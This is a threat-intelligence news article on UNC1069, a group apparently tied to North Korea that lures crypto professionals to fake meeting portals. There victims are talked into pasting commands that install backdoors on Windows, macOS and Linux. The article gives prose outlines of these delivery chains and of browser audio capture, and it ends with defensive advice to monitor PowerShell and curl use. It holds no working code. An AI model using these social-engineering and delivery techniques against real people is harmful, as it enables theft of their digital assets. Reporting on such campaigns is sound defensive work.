UNC1069 Launches Targeted Cyber Campaign Against Cryptocurrency Professionals
In recent cyber threat news, a group linked to North Korea, known as UNC1069, has been observed executing a highly targeted campaign aimed at compromising professionals within the cryptocurrency and Web3 industries. This operation is characterized by its sophisticated use of fake meeting platforms, including Zoom, Google Meet, and Microsoft Teams, to facilitate social engineering and malware deployment aimed at large-scale theft of digital assets.
The overarching objective of the UNC1069 group appears to be securing long-term access to their victims’ systems, thus enabling the theft of valuable digital assets over extended periods. The group employs stealthy tactics, primarily through social engineering techniques that mislead professionals into accepting fraudulent meeting invitations or engaging in conversations that lead to their compromise.
One of the more deceptive methods utilized in this campaign involves the hijacking of legitimate accounts to maintain ongoing discussions. This allows the attackers to orchestrate “due diligence” or “partnership” calls that seem authentic. Such methods bolster the attackers’ trustworthiness by employing scheduling tools like Calendly to set up these meetings. The group has reportedly replicated strategies seen in Bluenoroff/CryptoCore, another North Korean cyber actor, enhancing the risks for those in the cryptocurrency space.
Victims often find themselves receiving links to counterfeit meeting portals that are designed to closely resemble well-known platforms like Zoom, Google Meet, and Microsoft Teams. These portals occasionally employ AI-generated or replayed video footage, mimicking earlier victims or impersonated executives, creating an illusion of a live business interaction.
In these impersonated virtual meetings, UNC1069 takes advantage of pretexts involving audio or video issues, or even missing software development kits (SDKs), to coerce users into executing commands or installing what they believe are necessary updates. This strategy highlights a “ClickFix”-style flow, wherein victims are guided, in real time, to open terminal or elevated PowerShell windows, subsequently pasting commands provided by the malicious actors.
For Windows users, these commands initiate multiple PowerShell scripts that fetch and execute hidden VBScript payloads. These scripts are designed to alter Windows Defender settings to allow the attacker’s software to maintain persistence on the victim’s system.
On macOS platforms, victims face a similarly perilous situation, as they are led to execute commands that download malicious software disguised as components of the Zoom platform or other system elements. Such tactics override Gatekeeper security measures and facilitate the installation of a backdoor, identified as NukeSped RAT, which is linked to North Korean cyber operations.
Furthermore, in some instances, a Perl-based downloader substitutes the initial Mach-O stage but follows a similar blueprint, ensuring functionality despite varying techniques. This reflects a significant level of planning and adaptability on the part of UNC1069.
Linux users, too, are not immune from this digital assault. They are coerced into executing scripts that fetch ELF downloaders. This step involves resolving temporary working directories and repeatedly posting data to command-and-control (C2) endpoints, resulting in the execution of secondary malicious payloads that align with the techniques employed on Windows systems.
Beyond merely delivering malware, the phony meeting platforms constructed by UNC1069 also serve as covert surveillance mechanisms. The JavaScript employed on these pages exploits standard browser APIs to capture audio and video feeds, enabling malicious actors to record sensitive conversations. This data can be later reused to enhance the credibility of future attacks, potentially employing AI technology to generate highly realistic deepfake content.
An extensive analysis of the infrastructure supporting the campaign reveals an intricate web of attacker-controlled domains designed to impersonate legit meeting platforms and investment firms. These findings underscore the extensive ecosystem crafted by UNC1069, which enables them to operate under various guises while utilizing a fleet of common technical templates and tools.
Moreover, this operation has shown connections to supply-chain attacks, including the compromise of the Axios npm package. Such activities indicate the group’s adeptness at combining social engineering tactics with malware distribution strategies targeting high-value cryptocurrency entities.
In light of this evolving cyber threat landscape, organizations within the cryptocurrency and Web3 sectors are advised to exercise extreme caution regarding unsolicited outreach and meeting invitations. Practices such as verifying counterparties through out-of-band methods and enforcing strict protocols against executing terminal commands during such calls are recommended. Security teams can enhance their defenses by monitoring for suspicious activities linked to PowerShell, curl commands, and other scripting behaviors emerging from collaboration sessions.
Furthermore, organizations are urged to maintain vigilance concerning UNC1069’s infrastructure and malware activities while enforcing least-privilege access processes for their digital wallets. Such proactive measures are crucial in mitigating risks posed by potential account compromises and ensuring the protection of valuable digital assets.